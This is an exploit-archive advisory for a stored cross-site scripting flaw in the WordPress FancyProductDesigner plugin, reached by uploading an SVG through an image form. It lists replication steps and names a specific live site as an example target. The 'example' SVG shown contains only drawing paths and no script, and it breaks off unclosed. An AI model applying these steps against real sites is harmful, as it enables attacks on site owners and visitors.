exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress FancyProductDesigner 3.4.2 Stored XSS

WordPress FancyProductDesigner 3.4.2 Stored XSS
Posted May 2, 2017
Authored by Project Insecurity, MLT | Site insecurity.zone

WordPress FancyProductDesigner plugin versions prior to 3.4.2 suffer from a persistent cross site scripting vulnerability due to improper sanitization, allowing malicious .svg file uploads.

tags | exploit, xss, file upload
SHA-256 | e06356cf348ec440bf9bde069022db59898d3360eefbd1156c6c4aaf4c07d21c

WordPress FancyProductDesigner 3.4.2 Stored XSS

Change Mirror Download
           ______  ______   _____     ___   _____   _____   _____              
| ___ \ | ___ \ | _ | |_ | | ___| / __ \ |_ _|
| |_/ / | |_/ / | | | | | | | |__ | / \/ | |
| __/ | / | | | | | | | __| | | | |
| | | |\ \ \ \_/ / /\__/ / | |___ | \__/\ | |
\_| \_| \_| \___/ \____/ \____/ \____/ \_/


_____ _ _ _____ _____ _____ _ _ ______ _____ _____ __ __
|_ _| | \ | | / ___| | ___| / __ \ | | | | | ___ \ |_ _| |_ _| \ \ / /
| | | \| | \ `--. | |__ | / \/ | | | | | |_/ / | | | | \ V /
| | | . ` | `--. \ | __| | | | | | | | / | | | | \ /
_| |_ | |\ | /\__/ / | |___ | \__/\ | |_| | | |\ \ _| |_ | | | |
\___/ \_| \_/ \____/ \____/ \____/ \___/ \_| \_| \___/ \_/ \_/


[+]---------------------------------------------------------[+]
| Vulnerable Software: FancyProductDesigner(WP plugin) |
| Vendor: http://fancyproductdesigner.com |
| Vulnerability Type: Stored XSS + FPD / File upload |
| Date Released: 29/04/2017 |
| Released by: 5tarboy (@insecurity) |
[+]---------------------------------------------------------[+]

Fancy Product Designer is a paid wordpress plugin ($50 fee) that allows users to upload custom products of their choice
to the site. The upload form claims that it only allows files of PNG and JPG format, but it is possible to upload SVG
files also. There are estimated 40,000-50,000 vulnerable sites.

In order to replicate this vulnerability you navigate to the product upload page and simply upload an .svg payload.
Here is an example: https://www.saltsidecreations.com/product/ozark-20-oz/
It is possible to upload an .svg file via the image upload form - the file will be stored at http://[HOST]/wp-content/uploads/

Here is an example SVG file that can be uploaded (resulting in persistent/stored XSS):
------------------------------------------------------------------------------------------------------------

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 20010904//EN" "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd">
<svg version="1.0" xmlns="http://www.w3.org/2000/svg" width="300.000000pt" height="300.000000pt" viewBox="0 0 300.000000 300.000000" preserveAspectRatio="xMidYMid meet">
<metadata>
twitter: @insecurity
</metadata>
<g transform="translate(0.000000,300.000000) scale(0.100000,-0.100000)"
fill="#000000" stroke="none">
<path d="M128 2910 c-1 -49 -2 -100 -2 -112 -1 -19 4 -23 27 -23 15 0 27 3 27 8 0 4 0 54 0 112 l0 105 -25 0 c-25 0 -25 -1 -27 -90z m29 -27 c-3 -10 -5 -2 -5 17 0 19 2 27 5 18 2 -10 2 -26 0 -35z m0 -45 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z"/>
<path d="M290 2908 c0 -51 -3 -102 -6 -113 -5 -19 0 -20 85 -20 l91 0 0 113 c0 68 -4 112 -10 112 -10 0 -12 -9 -13 -72 0 -21 -4 -38 -9 -38 -4 0 -8 11 -8 24 0 44 -10 56 -38 49 -20 -5 -23 -3 -17 8 8 12 6 12 -8 1 -9 -8 -21 -11 -27 -7 -6 4 -10 3 -9 -2 1 -4 1 -21 0 -37 -2 -45 -12 -24 -14 28 -2 86 -17 46 -17 -46z m110 -21 l0 -62 -30 -1 -30 -2 0 64 0 64 30 0 30 0 0 -63z m30 -62 c-8 -9 -8 -15 0 -18 7 -4 7 -5 0 -3 -7 1 -11 5 -11 9 1 4 1 22 2 40 0 30 1 31 10 8 6 -16 6 -28 -1 -36z m-90 -16 c0 -5 -7 -9 -15 -9 -15 0 -20 12 -9 23 8 8 24 -1 24 -14z"/>
<path d="M600 2888 l0 -113 90 0 90 0 0 113 c0 93 -3 112 -15 112 -9 0 -15 -10 -15 -26 0 -20 -4 -25 -16 -20 -9 3 -18 6 -20 6 -3 0 -3 3 0 8 2 4 -13 6 -35 4 -36 -4 -39 -7 -39 -33 0 -16 -4 -29 -9 -29 -5 0 -6 20 -3 45 4 37 2 45 -12 45 -14 0 -16 -15 -16 -112z m118 -2 c-3 -58 -4 -61 -29 -61 -15 -1 -34 -7 -43 -14 -14 -12 -16 -10 -15 15 0 25 2 26 9 9 7 -18 9 -18 15 -3 4 10 5 41 3 70 l-3 53 33 -3 33 -4 -3 -62z m32 -44 c0 -19 -5 -29 -15 -29 -11 0 -12 4 -5 11 5 5 10 18 10 28 0 10 2 18 5 18 3 0 5 -13 5 -28z"/>
<path d="M919 2900 c-1 -55 -2 -105 -3 -111 -1 -8 28 -12 87 -13 l87 -1 0 113 c0 92 -3 112 -15 112 -9 0 -12 -6 -8 -17 4 -11 3 -14 -5 -9 -8 5 -8 -1 0 -24 5 -17 8 -34 4 -37 -3 -4 -6 0 -6 9 0 22 -33 48 -62 48 -38 0 -52 -36 -44 -109 5 -42 4 -61 -4 -61 -7 0 -11 28 -10 83 2 112 1 117 -10 117 -6 0 -11 -41 -11 -100z m111 -14 l0 -65 -29 1 c-30 1 -30 1 -30 65 l0 63 30 0 29 0 0 -64z m34 -69 c-3 -9 -11 -14 -16 -11 -6 4 -5 10 3 15 11 7 11 9 1 9 -7 0 -10 5 -6 11 10 16 26 -5 18 -24z"/>
<path d="M1211 2894 l3 -107 -50 -24 c-146 -72 -347 -121 -530 -130 l-122 -6 -6 -45 c-18 -134 -2 -496 30 -687 19 -108 84 -310 119 -365 30 -48 31 -57 5 -65 -11 -3 -20 -13 -20 -21 0 -8 -4 -13 -9 -10 -14 9 -7 34 15 51 16 12 17 14 2 15 -9 0 -23 3 -32 6 -14 5 -16 -8 -16 -110 l0 -116 91 0 c90 0 91 0 85 23 -3 12 -6 25 -6 30 0 15 -20 7 -20 -9 0 -8 -4 -13 -9 -9 -5 3 -12 1 -16 -5 -3 -5 -12 -10 -18 -10 -7 0 -4 5 6 11 11 7 17 22 17 49 0 22 3 40 8 40 4 0 18 -17 32 -37 32 -46 101 -117 165 -168 27 -22 59 -48 69 -57 11 -10 28 -20 38 -24 18 -5 19 -15 16 -115 l-3 -109 33 0 32 0 0 54 c0 69 -10 117 -22 110 -10 -6 -28 12 -28 28 0 9 39 -8 107 -47 l53 -30 0 -57 0 -58 91 0 c68 0 90 3 86 13 -2 6 -13 11 -24 9 -11 -1 -26 4 -33 13 -7 8 -25 15 -41 15 -21 0 -29 5 -30 18 0 9 -3 12 -5 5 -3 -7 0 -21 6 -32 8 -17 8 -19 -4 -15 -19 7 -24 22 -21 67 2 32 -2 38 -27 49 -15 7 -28 16 -28 19 0 3 -18 12 -40 19 -22 7 -45 19 -51 27 -6 7 -18 13 -25 13 -8 0 -13 5 -12 12 2 7 -2 12 -9 13 -14 0 -43 24 -61 51 -7 10 -10 13 -7 7 8 -17 -1 -16 -31 4 -19 12 -22 18 -12 25 10 7 9 8 -3 6 -9 -2 -37 16 -62 40 -26 23 -44 42 -42 42 3 0 -3 9 -12 20 -10 11 -23 20 -31 20 -7 0 -10 5 -6 12 4 7 3 8 -4 4 -7 -4 -12 -1 -12 8 0 9 -4 16 -8 16 -4 0 -16 14 -26 30 -9 17 -27 40 -39 52 -21 20 -21 21 -2 14 17 -5 18 -4 4 6 -19 15 -79 139 -79 162 0 9 -4 24 -9 34 -18 35 -30 68 -40 107 -14 53 -14 68 2 59 6 -4 4 1 -5 12 -9 11 -17 28 -17 39 0 11 -5 54 -11 95 -20 135 -23 183 -23 383 0 183 1 198 19 211 12 9 24 11 35 5 9 -4 18 -6 21 -4 3 3 34 7 69 9 82 6 187 24 212 37 10 6 28 9 38 6 13 -3 17 -1 12 6 -4 8 -1 7 9 -1 13 -10 17 -10 22 3 3 8 17 15 31 15 14 0 25 4 25 8 0 5 6 9 13 9 28 1 97 24 97 33 0 6 3 9 8 9 4 -1 10 0 15 1 10 3 25 7 35 9 4 0 19 12 34 26 15 14 42 28 60 32 18 3 44 17 58 30 13 13 29 23 34 23 5 0 16 7 25 15 9 8 29 27 46 42 16 16 35 27 43 25 9 -2 11 1 7 8 -11 18 34 2 58 -21 12 -10 29 -21 39 -25 10 -3 18 -11 18 -19 0 -7 9 -15 21 -18 13 -4 18 -10 13 -18 -4 -8 -3 -10 4 -5 7 4 12 3 12 -3 0 -6 6 -8 13 -6 17 7 80 -33 72 -45 -6 -10 7 -14 31 -11 6 1 17 -6 24 -14 7 -8 18 -15 26 -15 23 0 64 -23 58 -32 -3 -5 0 -8 7 -7 21 3 79 -13 79 -21 0 -5 10 -6 22 -2 15 4 19 2 13 -7 -5 -10 -2 -11 14 -6 12 4 21 2 21 -4 0 -6 7 -8 15 -5 8 4 22 1 30 -6 9 -7 18 -10 21 -7 3 3 20 1 37 -4 27 -8 129 -16 267 -22 33 -2 35 -4 39 -42 10 -88 4 -486 -8 -585 -7 -58 -13 -115 -13 -127 0 -13 -3 -21 -8 -18 -4 2 -5 -7 -2 -20 2 -15 0 -25 -7 -25 -7 0 -10 -4 -6 -10 6 -9 -39 -178 -51 -189 -4 -3 -3 5 0 19 6 21 5 22 -4 7 -6 -9 -8 -22 -5 -27 6 -11 -41 -117 -62 -138 -7 -7 -13 -18 -13 -23 0 -6 -4 -7 -10 -4 -6 4 -10 -5 -10 -20 0 -17 -7 -29 -22 -35 -13 -5 -19 -9 -14 -9 9 -1 -88 -101 -98 -101 -3 0 -28 -22 -55 -50 -27 -27 -56 -50 -64 -50 -8 0 -22 -11 -31 -25 -9 -14 -24 -25 -34 -25 -14 0 -14 -2 -3 -9 10 -6 27 -1 55 17 52 33 161 127 201 171 16 19 40 46 53 59 l22 25 -1 -39 c0 -21 -3 -34 -5 -27 -8 18 -34 4 -34 -18 0 -17 8 -19 88 -19 l87 0 -3 113 c-3 114 -3 114 -27 109 -15 -2 -22 -9 -18 -18 3 -8 9 -11 14 -8 5 3 9 -5 9 -17 0 -21 -1 -21 -20 -4 -19 17 -19 16 -17 -54 l2 -71 -31 0 c-31 0 -32 0 -29 46 2 28 11 55 23 68 62 69 142 314 168 516 18 136 25 536 11 630 l-8 55 -109 2 c-186 4 -350 41 -528 121 l-83 37 3 94 c2 71 0 95 -10 99 -9 3 -13 -3 -12 -14 1 -11 1 -37 0 -59 l-3 -40 -6 35 c-4 20 -2 39 4 43 6 5 2 6 -9 3 -10 -4 -24 -2 -30 3 -6 5 -21 5 -33 0 -26 -10 -48 -45 -33 -54 5 -3 10 -10 10 -16 0 -5 -9 -4 -20 3 -12 8 -18 19 -14 28 3 8 7 23 9 33 2 9 7 22 10 27 3 6 -4 10 -16 10 -19 0 -21 -4 -16 -35 3 -19 3 -35 -1 -35 -3 0 -21 14 -39 32 l-33 32 -25 -24 c-54 -55 -65 -60 -65 -30 0 18 10 25 33 21 4 0 7 8 7 19 0 15 -7 20 -25 20 -23 0 -25 -3 -25 -48 0 -47 -2 -50 -47 -79 -74 -48 -125 -74 -130 -69 -11 11 7 35 22 30 13 -5 15 7 15 80 0 96 -17 118 -23 29 l-3 -58 -2 58 c-2 44 -5 57 -18 57 -13 0 -15 -15 -13 -106z m489 6 c0 -27 5 -50 10 -50 6 0 10 8 10 17 0 22 6 14 14 -20 6 -26 5 -27 -14 -17 -11 6 -20 9 -20 6 0 -3 -13 7 -29 22 -16 16 -31 41 -33 60 -4 31 -3 32 29 32 33 0 33 0 33 -50z m-990 -1459 c5 -11 10 -40 10 -65 0 -43 -2 -46 -27 -46 -14 0 -35 -7 -45 -17 -17 -15 -18 -15 -18 0 0 10 6 16 13 15 8 -2 13 17 15 65 3 58 5 67 22 67 11 0 24 -9 30 -19z m-78 -83 c-7 -7 -12 -8 -12 -2 0 14 12 26 19 19 2 -3 -1 -11 -7 -17z m1737 -49 c-16 -10 -23 -4 -14 10 3 6 11 8 17 5 6 -4 5 -9 -3 -15z m-1276 -289 c-3 -12 -8 -19 -11 -16 -5 6 5 36 12 36 2 0 2 -9 -1 -20z m-6 -52 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z"/>
<path d="M1872 2889 l3 -112 28 -3 27 -3 0 115 c0 97 -2 114 -16 114 -13 0 -15 -14 -12 -95 2 -52 0 -95 -4 -95 -5 0 -8 43 -8 95 0 59 -4 95 -10 95 -7 0 -10 -40 -8 -111z"/>
<path d="M2040 2888 l0 -113 30 0 30 0 0 113 c0 117 -16 156 -23 55 l-3 -58 -2 58 c-2 43 -6 57 -17 57 -12 0 -15 -19 -15 -112z m43 -28 c3 -11 1 -23 -4 -26 -5 -3 -9 6 -9 20 0 31 6 34 13 6z"/>
<path d="M2220 2888 l0 -113 85 2 c47 1 85 5 85 8 0 3 0 52 0 110 0 63 -4 105 -10 105 -5 0 -11 -17 -11 -37 l-2 -38 -7 40 c-5 30 -8 33 -9 13 0 -15 -6 -30 -12 -33 -6 -4 -9 -31 -8 -62 3 -55 2 -56 -27 -59 l-29 -3 2 62 c1 62 1 62 32 65 38 4 31 22 -8 22 -45 0 -55 -21 -48 -98 5 -51 4 -63 -5 -48 -7 12 -9 48 -5 98 5 65 4 78 -8 78 -12 0 -15 -20 -15 -112z m147 -70 c-2 -13 -4 -3 -4 22 0 25 2 35 4 23 2 -13 2 -33 0 -45z"/>
<path d="M2510 2895 c0 -58 0 -108 0 -112 0 -4 12 -7 28 -7 27 0 27 0 25 65 -1 35 -2 85 -2 112 -1 46 -15 64 -24 30 -4 -17 -5 -17 -6 0 0 9 -5 17 -11 17 -6 0 -10 -42 -10 -105z m27 -67 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7 2 -19 0 -25z"/>
<path d="M2690 2901 c0 -55 -2 -105 -5 -113 -4 -10 14 -13 85 -13 l90 0 0 113 c0 68 -4 112 -10 112 -9 0 -11 -9 -15 -62 -1 -26 -15 -34 -15 -10 0 29 -45 59 -64 43 -16 -14 -46 -4 -46 15 0 8 -4 14 -10 14 -6 0 -10 -40 -10 -99z m112 -16 c-4 -64 -4 -65 -30 -62 -26 3 -27 7 -30 65 l-2 62 32 0 33 0 -3 -65z m-85 3 c-2 -13 -4 -5 -4 17 -1 22 1 32 4 23 2 -10 2 -28 0 -40z m119 -57 c-4 -6 -13 -11 -19 -10 -9 0 -9 2 0 5 7 3 9 13 6 22 -5 13 -3 14 7 5 7 -6 9 -16 6 -22z m-112 4 c3 -8 1 -15 -4 -15 -6 0 -10 7 -10 15 0 8 2 15 4 15 2 0 6 -7 10 -15z m99 -32 c-7 -2 -19 -2 -25 0 -7 3 -2 5 12 5 14 0 19 -2 13 -5z"/>
<path d="M1490 2762 c-8 -3 -19 -11 -23 -19 -5 -7 -14 -10 -20 -7 -7 4 -9 4 -5 -1 11 -12 -40 -48 -58 -41 -10 4 -14 1 -11 -6 5 -16 -89 -70 -121 -70 -12 0 -25 -5 -29 -11 -4 -6 -1 -7 7 -2 8 5 11 4 6 -3 -3 -6 -20 -13 -36 -17 -16 -4 -32 -11 -35 -16 -4 -5 -22 -9 -41 -9 -19 0 -33 -4 -30 -9 4 -5 -13 -12 -36 -16 -24 -4 -69 -13 -100 -21 -32 -8 -96 -16 -143 -17 -116 -4 -114 -1 -115 -202 0 -161 15 -346 30 -376 5 -9 6 -27 3 -39 -3 -13 -2 -21 3 -18 5 4 10 -11 12 -33 1 -21 11 -58 21 -81 10 -24 16 -49 14 -55 -3 -7 1 -13 7 -13 7 0 9 -9 5 -22 -5 -18 -4 -20 4 -8 9 13 11 13 11 0 0 -20 33 -84 53 -105 9 -8 14 -22 10 -30 -4 -11 0 -14 13 -9 11 4 16 4 13 0 -6 -6 44 -69 88 -110 52 -49 88 -81 93 -81 17 -1 52 -36 47 -48 -4 -10 1 -13 19 -9 14 2 32 -2 42 -11 9 -8 27 -18 40 -22 12 -3 20 -11 16 -16 -3 -5 -2 -8 3 -7 14 4 94 -32 89 -40 -3 -5 8 -7 25 -6 21 1 29 -2 29 -14 0 -14 2 -14 9 -3 7 11 12 10 28 -6 11 -11 31 -18 48 -17 17 1 35 -3 42 -8 8 -7 18 -5 28 6 9 9 22 16 28 16 7 0 29 9 50 20 43 23 51 25 41 8 -4 -7 2 -4 13 8 11 11 41 28 67 38 27 10 43 22 40 28 -4 6 -2 8 3 5 12 -7 139 74 160 101 7 9 13 14 13 10 0 -11 81 75 125 132 22 29 48 61 57 71 9 9 14 20 11 23 -3 2 5 15 16 27 12 13 19 29 17 35 -2 6 2 21 9 31 8 11 22 48 31 81 9 34 21 59 26 56 4 -3 8 -1 8 5 0 5 -4 12 -8 15 -4 3 -6 21 -4 42 3 21 8 31 12 24 18 -30 28 199 20 493 -2 82 -5 100 -21 111 -10 7 -17 15 -14 18 7 7 -27 7 -45 0 -25 -9 -50 -10 -50 0 0 5 -21 8 -47 7 -27 -1 -61 1 -78 4 -92 14 -114 20 -108 30 3 5 1 7 -5 3 -6 -3 -23 -1 -39 6 -15 6 -31 12 -35 13 -5 2 -10 4 -13 5 -7 3 -22 7 -36 9 -5 0 -8 5 -5 10 3 5 -1 12 -10 15 -8 3 -12 2 -9 -4 10 -16 -11 -12 -25 4 -6 8 -19 12 -27 9 -11 -4 -14 -2 -9 5 6 11 2 13 -19 12 -3 -1 -12 5 -20 12 -32 29 -45 39 -45 33 0 -3 -14 7 -31 22 -45 41 -82 61 -99 55z m141 -115 c50 -32 134 -74 211 -105 73 -30 209 -54 304 -56 l102 -1 6 -73 c24 -262 -17 -595 -94 -767 -58 -129 -174 -257 -315 -350 -98 -64 -122 -76 -242 -125 l-95 -38 -68 23 c-117 40 -244 107 -345 184 -217 165 -325 375 -354 691 -19 214 -21 245 -14 341 l6 96 106 6 c151 9 294 48 433 118 77 39 188 111 213 139 l19 21 35 -34 c20 -19 61 -50 92 -70z"/>
<path d="M1330 2441 c-104 -26 -140 -41 -140 -57 0 -19 20 -18 89 6 91 30 227 44 316 30 77 -12 98 -9 89 14 -6 16 -3 15 -154 21 -100 3 -140 1 -200 -14z"/>
<path d="M1737 2413 c-9 -14 5 -27 44 -41 46 -16 59 -15 59 3 0 22 -92 55 -103 38z"/>
<path d="M1377 2373 c-20 -3 -27 -9 -25 -21 2 -11 11 -16 23 -13 11 2 70 3 130 4 154 1 256 -32 368 -117 48 -37 77 -46 77 -24 0 37 -159 128 -276 158 -73 19 -216 25 -297 13z"/>
<path d="M1200 2310 c-74 -39 -180 -122 -180 -141 0 -25 33 -19 63 11 40 41 137 105 183 120 23 8 34 17 32 28 -5 26 -20 23 -98 -18z"/>
<path d="M1438 2298 c-37 -3 -85 -12 -105 -19 -180 -58 -321 -211 -340 -368 -5 -47 -4 -51 14 -51 17 0 22 9 28 47 11 73 57 163 111 216 97 97 200 138 349 142 77 2 100 6 100 16 0 18 -70 26 -157 17z"/>
<path d="M1647 2273 c-14 -13 -6 -22 31 -33 20 -7 57 -23 81 -37 39 -23 45 -24 59 -9 14 14 9 18 -59 51 -72 35 -99 41 -112 28z"/>
<path d="M990 2235 c0 -8 5 -15 10 -15 6 0 10 7 10 15 0 8 -4 15 -10 15 -5 0 -10 -7 -10 -15z"/>
<path d="M1467 2224 c-21 -21 -3 -32 66 -36 126 -9 221 -58 292 -150 44 -58 65 -124 65 -208 0 -65 2 -70 21 -70 21 0 21 4 17 93 -3 81 -8 99 -38 155 -50 94 -142 167 -250 200 -47 14 -164 25 -173 16z"/>
<path d="M1322 2188 c-41 -17 -72 -36 -72 -44 0 -20 14 -18 89 12 78 31 86 37 69 52 -10 8 -32 3 -86 -20z"/>
<path d="M1853 2154 c-3 -10 7 -29 29 -52 19 -20 44 -56 54 -79 20 -45 33 -56 53 -43 16 10 -12 66 -69 138 -43 55 -57 62 -67 36z"/>
<path d="M772 2135 c0 -16 2 -22 5 -12 2 9 2 23 0 30 -3 6 -5 -1 -5 -18z"/>
<path d="M1410 2136 c-69 -19 -111 -44 -159 -94 -52 -54 -80 -113 -81 -164 0 -31 4 -38 20 -38 14 0 20 7 20 23 0 109 106 219 233 242 27 5 37 12 35 23 -4 21 -15 22 -68 8z"/>
<path d="M1543 2143 c-27 -9 -12 -32 25 -38 20 -4 47 -10 60 -16 17 -7 24 -5 29 6 3 9 3 18 0 21 -9 9 -102 31 -114 27z"/>
<path d="M1173 2088 c-58 -61 -86 -132 -93 -234 -4 -81 -8 -94 -29 -111 -14 -11 -21 -25 -17 -31 11 -19 31 -14 57 14 21 22 25 39 30 118 6 102 29 162 82 216 17 18 27 36 23 45 -8 22 -19 19 -53 -17z"/>
<path d="M1695 2070 c-3 -5 11 -26 31 -46 63 -64 76 -108 73 -242 -3 -101 -1 -117 12 -120 25 -5 29 18 26 151 -2 135 -10 158 -76 230 -35 37 -55 45 -66 27z"/>
<path d="M1445 2063 c-38 -8 -90 -36 -118 -62 -49 -45 -67 -92 -67 -176 0 -90 -22 -141 -81 -194 -39 -33 -52 -71 -25 -71 23 0 124 117 135 158 6 20 11 66 11 101 0 112 41 170 144 205 61 21 131 9 189 -31 59 -41 77 -86 77 -191 0 -156 -47 -280 -151 -395 -49 -54 -57 -68 -44 -73 19 -8 70 37 124 111 78 106 111 209 111 349 0 116 -16 162 -72 212 -56 50 -155 75 -233 57z"/>
<path d="M1424 1970 c-55 -28 -72 -65 -77 -170 -4 -102 -23 -143 -96 -215 -49 -48 -66 -85 -37 -85 19 0 122 113 147 162 15 30 23 70 28 141 6 95 8 100 36 123 23 18 42 24 83 24 46 0 58 -4 83 -29 28 -28 29 -33 29 -119 0 -158 -53 -275 -179 -396 -34 -31 -61 -62 -61 -67 0 -28 45 0 112 69 134 138 162 205 163 384 0 110 -1 118 -25 143 -52 57 -134 70 -206 35z"/>
<path d="M1459 1897 c-13 -10 -18 -34 -20 -102 -5 -119 -33 -176 -133 -275 -41 -40 -73 -77 -70 -82 13 -20 40 -3 110 67 96 96 124 156 133 280 5 81 8 90 26 90 18 0 20 -8 23 -64 6 -136 -30 -222 -145 -340 -45 -47 -80 -89 -77 -93 11 -18 33 -4 107 70 111 110 148 187 155 323 4 86 2 102 -13 119 -21 23 -71 26 -96 7z"/>
<path d="M1170 1771 c0 -22 -12 -41 -45 -73 -44 -42 -58 -78 -31 -78 18 0 94 83 106 116 16 41 12 64 -10 64 -15 0 -20 -7 -20 -29z"/>
<path d="M1774 1603 c-3 -10 -12 -33 -20 -52 -16 -35 -8 -56 17 -46 16 6 51 94 43 107 -9 14 -34 8 -40 -9z"/>
<path d="M1595 1330 c-3 -5 -1 -10 4 -10 6 0 11 5 11 10 0 6 -2 10 -4 10 -3 0 -8 -4 -11 -10z"/>
<path d="M124 2497 l1 -112 87 -2 88 -2 0 115 0 114 -88 0 -88 0 0 -113z m149 68 c-7 -21 -13 -19 -13 6 0 11 4 18 10 14 5 -3 7 -12 3 -20z m-101 3 c-5 -7
-12 -22 -15 -33 -3 -13 -5 -9 -6 13 -1 23 3 32 15 32 12 0 14 -3 6 -12z m70 -59 c-3 -42 0 -75 6 -81 14 -14 26 30 20 72 -2 16 -1 27 4 24 9 -6 11 -75 2 -98 -3 -9 -15 -16 -26 -16 -10 0 -16 5 -13 10 4 6 -7 10 -24 10 l-31 0 0 65 0 65 30 0 c17 0 30 5 30 10 0 6 1 10 3 10 1 0 1 -32 -1 -71z m-58 -92 c7 -5 3 -7 -9 -5 -13 2 -21 12 -23 28 -2 24 -2 24 9 5 7 -11 17 -24 23 -28z"/>
<path d="M420 2497 l0 -114 30 -1 30 -1 0 115 0 114 -30 0 -30 0 0 -113z m31 -24 c2 -23 0 -45 -4 -49 -4 -4 -7 17 -7 46 0 62 7 64 11 3z"/>
<path d="M2527 2498 l2 -112 86 -3 85 -3 0 115 0 115 -87 0 -88 0 2 -112z m73 88 c0 -3 -4 -8 -10 -11 -5 -3 -10 -1 -10 4 0 6 5 11 10 11 6 0 10 -2 10 -4z m-30 -15 c0 -6 -4 -12 -8 -15 -5 -3 -9 1 -9 9 0 8 4 15 9 15 4 0 8 -4 8 -9z m108 -18 c2 -12 -1 -30 -7 -40 -8 -14 -9 -8 -4 21 4 27 3 37 -5 32 -6 -3 -14 -1 -17 5 -5 7 0 10 11 7 11 -2 20 -13 22 -25z m-38 -58 l0 -65 -30 0 -30 0 1 65 c2 65 2 65 30 65 29 0 29 0 29 -65z m35 -66 c-4 -11 -15 -19 -26 -19 -11 0 -17 5 -14 10 3 6 13 10 20 10 11 0 13 9 9 33 -4 29 -4 30 6 8 6 -13 8 -32 5 -42z m-106 -7 c1 -7 -3 -10 -9 -7 -5 3 -10 18 -9 33 0 24 1 25 9 7 5 -11 9 -26 9 -33z"/>
<path d="M2800 2495 l0 -115 30 0 30 0 0 115 0 115 -30 0 -30 0 0 -115z m40 -31 c0 -34 -4 -53 -10 -49 -5 3 -10 28 -10 56 0 27 5 49 10 49 6 0 10 -25 10 -56z"/>
<path d="M123 2140 l-1 -110 29 0 29 0 0 94 c0 52 3 101 6 110 5 13 -1 16 -27 16 l-34 0 -2 -110z"/>
<path d="M285 2140 l0 -110 88 0 87 0 0 110 0 110 -87 0 -88 0 0 -110z m147 68 c-2 -10 -6 -18 -8 -18 -2 0 -8 8 -13 18 -7 14 -6 18 8 18 12 0 17 -6 13 -18z m-32 -71 l0 -64 -30 5 c-29 4 -30 5 -30 63 0 59 0 59 30 59 l30 0 0 -63z m37 -27 c4 -48 3 -59 -8 -55 -10 4 -13 21 -11 66 5 74 13 70 19 -11z m-114 -4 c2 -16 12 -35 23 -43 18 -14 18 -14 -6 -11 -27 3 -39 28 -32 66 6 28 10 25 15 -12z"/>
<path d="M2510 2140 l0 -110 28 0 27 0 0 110 0 110 -27 0 -28 0 0 -110z m27 -42 c-2 -13 -4 -5 -4 17 -1 22 1 32 4 23 2 -10 2 -28 0 -40z"/>
<path d="M2685 2140 l0 -110 88 0 87 0 0 110 0 110 -87 0 -88 0 0 -110z m135 73 c0 -14 -2 -15 -9 -4 -6 10 -20 12 -45 8 -20 -3 -36 -2 -36 2 0 4 20 8 45 10 38 2 45 -1 45 -16z m-20 -73 c0 -60 0 -60 -30 -60 -30 0 -30 0 -30 60 0 60 0 60 30 60 30 0 30 0 30 -60z m40 44 c0 -8 -5 -12 -10 -9 -6 4 -8 11 -5 16 9 14 15 11 15 -7z m-104 -119 c13 -9 12 -11 -5 -11 -19 0 -21 6 -19 56 1 53 2 53 5 11 3 -25 11 -50 19 -56z m91 73 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m13 -43 c0 -25 -32 -50 -53 -41 -7 2 -4 5 6 5 11 1 20 12 24 31 7 36 23 40 23 5z"/>
<path d="M124 1750 l1 -110 88 0 87 0 0 110 0 110 -88 0 -89 0 1 -110z m37 53 c-9 -16 -10 -14 -11 12 0 21 3 26 11 18 8 -8 8 -16 0 -30z m93 21 c5 -14 4 -15 -9 -4 -17 14 -19 20 -6 20 5 0 12 -7 15 -16z m-14 -77 c0 -62 0 -63 -27 -61 -27 1 -28 3 -31 62 l-3 62 31 0 30 0 0 -63z m37 11 c-2 -13 -4 -5 -4 17 -1 22 1 32 4 23 2 -10 2 -28 0 -40z m-13 -85 c-17 -17 -18 -17 -11 0 4 10 7 24 7 30 0 8 3 8 11 0 9 -9 7 -16 -7 -30z m-94 2 c10 -12 10 -15 -4 -15 -9 0 -16 7 -16 15 0 8 2 15 4 15 2 0 9 -7 16 -15z"/>
<path d="M420 1750 l0 -110 30 0 30 0 0 110 0 110 -30 0 -30 0 0 -110z"/>
<path d="M2525 1750 l0 -110 88 0 87 0 0 110 0 110 -87 0 -88 0 0 -110z m45 66 c0 -23 -16 -27 -17 -5 -1 10 2 19 8 19 5 0 9 -6 9 -14z m101 -3 c5 -97 5 -134 -2 -145 -5 -8 -9 17 -9 59 0 39 -3 78 -6 87 -3 9 -1 16 5 16 6 0 11 -8 12 -17z m-29 -72 c2 -52 0 -67 -9 -60 -6 6 -20 9 -30 7 -16 -3 -18 5 -21 60 l-3 62 30 0 29 0 4 -69z m-85 -23 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m20 -44 c2 -6 -3 -11 -12 -11 -8 0 -15 7 -15 15 0 15 22 12 27 -4z"/>
<path d="M2800 1751 c0 -108 0 -109 25 -113 13 -3 27 -3 30 0 3 3 5 54 5 114 l0 108 -30 0 -30 0 0 -109z m40 -11 c0 -33 -4 -60 -9 -60 -9 0 -14 98 -5 112 11 17 14 6 14 -52z"/>
<path d="M641 1634 c0 -11 3 -14 6 -6 3 7 2 16 -1 19 -3 4 -6 -2 -5 -13z"/>
<path d="M129 1507 c0 -1 -1 -53 -2 -115 l-2 -112 28 0 27 0 0 105 c0 58 1 108 3 111 1 4 -10 8 -25 10 -16 1 -28 2 -29 1z m28 -99 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7 2 -19 0 -25z"/>
<path d="M290 1505 c-1 0 -2 -51 -3 -113 l-2 -112 88 0 88 0 -3 111 -3 111 -83 1 c-45 1 -82 2 -82 2z m142 -47 c5 -76 3 -144 -7 -150 -16 -12 -35 -9 -32 5 1 7 -10 13 -26 15 -28 3 -28 4 -25 65 3 59 4 62 31 64 l27 2 0 -70 c0 -44 4 -69 11 -69 8 0 10 26 7 80 -2 44 0 80 4 80 5 0 9 -10 10 -22z m-109 -3 c-3 -9 -8 -14 -10 -11 -3 3 -2 9 2 15 9 16 15 13 8 -4z m10 -144 c10 -11 9 -13 -3 -9 -17 5 -28 59 -20 103 4 22 6 16 8 -25 2 -30 9 -61 15 -69z"/>
